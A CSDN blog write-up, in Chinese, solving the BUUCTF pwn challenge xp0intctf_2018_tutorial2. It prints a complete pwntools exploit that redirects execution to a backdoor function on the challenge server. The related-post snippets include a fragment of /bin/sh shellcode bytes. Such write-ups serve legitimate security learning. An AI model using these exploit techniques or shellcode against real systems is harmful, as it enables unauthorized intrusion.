BUUCTF pwn xp0intctf_2018_tutorial2

最新推荐文章于 2022-03-21 16:33:22 发布
最新推荐文章于 2022-03-21 16:33:22 发布
阅读量172 收藏
点赞数
分类专栏: pwn安全 文章标签: 安全 python pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/stareforever/article/details/114629192
版权

查看保护
在这里插入图片描述
pie没开

IDA打开查看程序流
在这里插入图片描述
程序有后门函数backdoor
在这里插入图片描述
那么首先读入buf 4字节,使得buf的值为0xdeadbeef
然后再读入v4 4字节,这里使得v4的内容为backdoor的地址
而程序是64位的,可以用p32进行输入

完整ex

from pwn import *

context(log_level='debug')

#io=process("./Xp0intCTF_2018_tutorial2")
io=remote("node3.buuoj.cn",26963)

io.recv()

io.send(p32(0xdeadbeef))

io.recv()

backdoor=0x4006e6

io.send(p32(backdoor))

io.recv()

io.interactive()
求是量子
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CSAW2016之PWN题目tutorial的解法
HappyOrange2014的专栏
09-27 1978
每次做pwn题目都像破案一样,千头万绪,环环相扣,在凑齐所有线索之后一击致命,非常有意思。但毕竟初学,还需凭着这点兴趣继续努力!该题目是在64bit的linux运行的。用户可以选择3个选项,第一个选项会打印出puts函数的地址,第二个选项存在栈溢出,可以输入shellcode,第三个选项会退出程序。
CTF-Mobile-Tutorial:我写的一些Mobile CTF题解
03-28
CTF移动版 作者:wnagzihxa1n邮件: 作为一个CTF弱鸡,每次比赛除了湿敷们吊打,就是被湿敷们吊打 好在比赛的时候收集了过多的过渡,痛定思痛,努力学习,走向以后被湿敷们轻点吊打
BUUCTF pwn Xp0intCTF_2018_bof
stareforever的博客
01-11 8768
查看程序保护 保护基本都没开 IDA打开查看程序流程 读入0x18个字符,NAME位置在bss段 然后程序进入到fun1函数,有明显的栈溢出漏洞,溢出长度为0x10,正好可以控制返回地址 主要思想:基本保护都没开,那么可以先在NAME处读入shellcode。后面进入到fun1函数里,利用栈溢出控制程序返回到NAME处 这里shellcode长度最多为0x18 那么可以用 shellcode=b"\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56
tutorial2
zip471642048的博客
12-19 141
附件拖到ida里反编译查看c代码。 main函数 int __cdecl main(int argc, const char **argv, const char **envp) { void (__fastcall *v4)(_QWORD, _QWORD); // [rsp+8h] [rbp-18h] char buf; // [rsp+10h] [rbp-10h] unsigned __int64 v6; // [rsp+18h] [rbp-8h] v6 = __readfsqword
BUUCTF pwn xp0intctf_2018_tutorial1
stareforever的博客
01-08 1万+
查看保护 用IDA打开查看程序流程 有后门函数backdoor,可以直接获得shell 程序逻辑很简单,输入buf使得buf==0xBABABABA即可获得shell 那么直接可以构造payload 完整ex from pwn import * context(log_level='debug') #io=process("./Xp0intCTF_2018_tutorial1") io=remote("node3.buuoj.cn",25721) io.recv() buf=0xBABABA
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
【标题】"PWN.rar" 是一个包含与 AVR 单片机、PWM 脉冲输出、GPS 和 FPGA 相关资源的压缩包。其中,"AVR_PWM_GPS_FPGA_PWN_avr_avr_pwn" 可能是项目或文件集合的命名,暗示了这些技术的综合应用。 【描述】描述指出...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
PWN.zip_PWN控制舵机_pwn控制_pwn控制h桥_数字舵机_电机
07-14
pwm波输出,实现数字舵机的控制,完成一些简单的电机控制问题
PWM.rar_ARM7 汇编_PWN_pwm arm7
09-22
2. ARM7汇编代码:可能包括更底层的定时器控制和中断处理函数,这些函数可能直接操作硬件寄存器以实现PWM功能。 学习和理解这些代码,可以帮助开发者深入掌握ARM7处理器上的PWM接口实现,以及如何在汇编和C语言之间...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Xp0intCTF 2017 writeup
P2017118的博客
10-23 1782
SGA 弗拉戈在哪里?
Pwntools的context设置与shellcode
半岛铁盒的博客
02-27 4181
文章目录一、context二、汇编与shellcode简单的例子???? 一、context context 是 pwntools 用来设置环境的功能。在很多时候,由于二进制文件的情况不同,我们可能需要进行一些环境设置才能够正常运行exp,比如有一些需要进行汇编,但是32的汇编和64的汇编不同,如果不设置context会导致一些问题。 一般来说我们设置context只需要简单的一句话: context(os='linux', arch='amd64', log_level='debug') 或者 con
PwnTheBox pwn题学习笔记
m0_68381884的博客
03-21 502
tutorial1 我们拿到手一个文件后使用Ubuntu,用file来查看一下文件格式。 文件为64-bit,我们打开IDA64,并将文件拖进去。 checksec命令可以用来查看该文件有哪些保护措施。 接下来是IDA反编译之后的伪c代码 ,然后查看mijie -1162167622转化成16进制后为0xBABABABA 当buf的值为0xBABABABA时,函数会跳转到backdoor函数 我们双击backdoor可以得到 接下来写exploit from pw..
[BUUCTF-pwn] xp0intctf_2018_gameserver
weixin_52640415的博客
11-17 278
snprintf 函数错用造成栈溢出漏洞 32位程序,没有canary ,又是一个rop的题 先看程序: puts("First, you need to tell me you name?"); fgets(byte_804A180, 256, stdin); v4 = strrchr(byte_804A180, 10); if ( v4 ) *v4 = 0; printf("Hello %s\n", byte_804A180); puts("What's you oc
BUUCTF pwn qctf_2018_dice_game
热门推荐
stareforever的博客
12-25 3万+
查看保护 程序流程 输入name后 连续猜对50次随机数即可获得flag 输入buf的可以覆盖栈上的内容,那么输入0x50个字符就可以覆盖seed,最终产生的随机数就是定值了 考虑输入0x50个‘A’,那么写c程序 可以获得生成的随机数列表 3, 3, 2, 1, 5, 3, 4, 6, 3, 4, 2, 2, 3, 2, 1, 1, 4, 5, 4, 6, 3, 6, 4, 3, 4, 2, 2, 6, 1, 2, 2, 3, 4, 1, 2, 1, 4, 5, 4, 6, 6, 5, 1, 3,
pwn题bbctf_2020_fmt_me
stareforever的博客
12-21 2万+
BUUCTF pwn题bbctf_2020_fmt_me 题目流程 snprintf 格式化漏洞 用gdb查看第一个参数的内容即可观察 参数位置在bss 0x4040a0 偏移为6 那么依据题目的意思 可以将atoi 改为system_plt; 将system_got改为main返回再次输入/bin/sh获得shell 完整ex.py ...
XCTF 攻防世界 pwn CGfsb
stareforever的博客
12-22 2万+
XCTF 攻防世界 pwn CGfsb 题目流程 printf(&s) 明显的format string 漏洞 修改pwnme的值为8 完整的ex
BUUCTF pwn 鹏城杯_2018_code
stareforever的博客
12-28 2万+
查看保护 程序流程 先输入name,然后通过对输入的字符串进行检测,通过后进入到have_fun()函数 check_str()函数要求输入的字符串ascii码在[65,90],[97,122],即字符‘A’-‘Z’和’a’-’z’; 另一个函数要求如下结果 这里可以写相应的python代码进行爆破(时间太长,可以测试查看规律) 相应的结果如下 可以发现结果是递增的,并且 那么可以猜测进行测试 确定第一个为w,后面以从类推 那么输入‘wyBTs’即可成功通过检测 进入到have_fu
BUUCTF pwn 安洵杯_2018_neko
stareforever的博客
12-23 2万+
查看保护 PIE和canary都没开 IDA打开,查看程序流程 先输入’y’或’Y’进入play函数 read存在栈溢出漏洞,cancary保护没开,可以直接溢出 溢出距离为0xd0 程序有后门 但这没有效果 那么可以先把puts函数的地址打印出来,求得libc的基地址,然后再求相应的‘/bin/sh’地址,system地址源程序有提供,第二次溢出时就可以获得shell 完整ex ...
BUUCTF pwn rip
最新发布
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值